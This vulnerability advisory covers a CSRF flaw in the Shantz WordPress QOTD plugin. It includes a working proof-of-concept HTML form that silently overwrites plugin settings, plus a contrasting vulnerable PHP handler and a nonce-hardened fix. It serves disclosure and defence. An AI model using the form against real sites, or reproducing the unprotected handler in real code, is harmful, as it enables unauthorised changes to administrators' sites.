wpexploit | Prashant Karman Patel | WPEX-ID:1DD0F9A8-22AB-4ECC-A925-605822739000
History: Jul 19, 2021 - 12:00 a.m.

Shantz WordPress QOTD <= 1.2.2 - Arbitrary Setting Update via CSRF

Published: 2021-07-19 00:00:00
Author: Prashant Karman Patel
Tags: wordpress, shantz qotd, csrf, arbitrary setting update

EPSS: 0.001 (percentile 27.4%)

The plugin performs no CSRF check (no nonce verification) when its settings form is submitted. An attacker who lures a logged-in administrator to a page carrying the form below can therefore overwrite every plugin setting with arbitrary values; the administrator's session cookie is sent automatically with the cross-site POST and the plugin accepts the request as if the administrator had submitted it.

<html>
  <body>
    <!-- Proof of concept: a cross-site POST to the plugin's settings page.
         Field names match the plugin's settings form; no nonce field is required. -->
    <form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
      <input type="hidden" name="shantzWpQotdEnable" value="true" />
      <input type="hidden" name="shantzWpQotdSrcBox" value="true" />
      <input type="hidden" name="shantzWpQotdSrcFile" value="false" />
      <input type="hidden" name="shantzWpQotdSeparator" value="" />
      <input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
      <input type="hidden" name="shantzWpQotdPattern" value="qottd" />
      <input type="hidden" name="shantzWpQotdAddAuto" value="true" />
      <input type="hidden" name="shantzWpQotdExcludePages" value="false" />
      <input type="hidden" name="shantzWpQotdAddBottom" value="true" />
      <input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
      <input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
      <input type="hidden" name="update_shantzWpQotdPluginSettings" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
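The following is an added example, not code from the plugin or from the advisory author. It shows the settings-handler pattern the form above exploits (a state change driven by POST fields alone) next to a hardened version built on WordPress's nonce API. The function names, the nonce action string and the `manage_options` capability are assumptions made for illustration; only the option and field names are taken from the proof of concept.

```php
<?php
// Added illustration (not the plugin's own code). Function names, the nonce
// action string and the capability are assumptions for this example.

// --- Vulnerable pattern: the request is accepted on the strength of the
//     session cookie alone. Shown for contrast; not hooked anywhere. ---
function qotd_example_save_unprotected() {
    if ( ! isset( $_POST['update_shantzWpQotdPluginSettings'] ) ) {
        return;
    }
    // Any POST carrying the admin's cookie reaches this line, including one
    // auto-submitted by a hidden form on an attacker-controlled site.
    update_option( 'shantzWpQotdDb', wp_unslash( $_POST['shantzWpQotdDb'] ?? '' ) );
    update_option( 'shantzWpQotdEnable', ( $_POST['shantzWpQotdEnable'] ?? '' ) === 'true' );
}

// --- Hardened pattern: render a nonce with the form, then require it. ---
function qotd_example_render_form() {
    echo '<form method="post">';
    // Emits hidden _wpnonce and _wp_http_referer fields. The nonce is derived
    // from the action name, the current user's session token and a time
    // window, so a page on another origin cannot produce a valid one.
    wp_nonce_field( 'qotd_example_save_settings' );
    echo '<input type="text" name="shantzWpQotdDb" value="'
        . esc_attr( get_option( 'shantzWpQotdDb', '' ) ) . '" />';
    echo '<input type="checkbox" name="shantzWpQotdEnable" value="true"'
        . checked( get_option( 'shantzWpQotdEnable' ), true, false ) . ' />';
    submit_button( 'Update Settings', 'primary', 'update_shantzWpQotdPluginSettings' );
    echo '</form>';
}

function qotd_example_save_protected() {
    if ( ! isset( $_POST['update_shantzWpQotdPluginSettings'] ) ) {
        return;
    }
    // 1. Authorisation: the caller must be allowed to change options at all.
    //    This alone does NOT stop CSRF, because the victim is an administrator.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // 2. CSRF defence: the request must carry a nonce valid for this exact
    //    action. check_admin_referer() verifies _wpnonce with wp_verify_nonce()
    //    and stops the request with an "are you sure?" page if it is missing,
    //    stale or issued for a different action or user.
    check_admin_referer( 'qotd_example_save_settings' );
    // 3. Validate and sanitise before storing.
    $db = sanitize_text_field( wp_unslash( $_POST['shantzWpQotdDb'] ?? '' ) );
    update_option( 'shantzWpQotdDb', $db );
    update_option(
        'shantzWpQotdEnable',
        isset( $_POST['shantzWpQotdEnable'] ) && 'true' === $_POST['shantzWpQotdEnable']
    );
}

add_action( 'admin_init', 'qotd_example_save_protected' );
```

Submitting the proof-of-concept form against the hardened handler fails at `check_admin_referer()`: the cross-site page cannot include a `_wpnonce` value, so WordPress halts with its "The link you followed has expired" page and `update_option()` is never reached. The capability check is still worth keeping as defence in depth, but on its own it is exactly what the advisory's attack bypasses, since the administrator's own session satisfies it.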
